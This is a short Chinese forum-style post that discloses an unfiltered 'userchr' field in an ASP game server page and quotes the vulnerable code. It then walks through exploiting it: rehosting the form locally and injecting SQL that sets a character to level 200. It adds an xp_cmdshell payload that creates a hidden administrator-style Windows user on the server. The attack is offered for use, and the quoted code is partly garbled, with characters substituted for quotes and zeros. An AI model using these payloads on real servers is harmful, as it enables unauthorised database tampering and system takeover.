在****.asp中,没有对userchr进行过滤,导致SQL注入..不给你文件名!!自己找吧!<I--#include file="conn.asp" -><!--#include file="top.asp" -><%n=request.form("username")p=request.form("userchr")if instr(n,"V")<>O then response.endif instr(n,"=")<>O then response.endif instr(n,"%")<>O then response.endif n<>"" and p<>"" thenset rs1 = Server.CreateObject("ADODB.Recordset")sql="select * from Character where AccountID=V"&n&"V and Name=\""&p&"V and pklevel<>3""rs1.open sql,conn,1,3只对username进行了过滤,不够严密饿)下面把clearpk.asp另存为本地htm文件然后把action="clearPK.asp"改为action="http:/服务器/clearpk.asp.把表单项里的maxlength去掉..OK..在角色名称里输入:X\';update character set clevel=200 where accountiID=\YOUID\.-在用户名里输入:haha好了,你的人物已经200级了饿如过管理员未对xp_cmdshell存储过程进行限止,那么你还可以把上面的语句换为:XXV;exec master.xp_cmdshell Vnet user hu_ti$ 123 /addV;--加了一个用户饿.
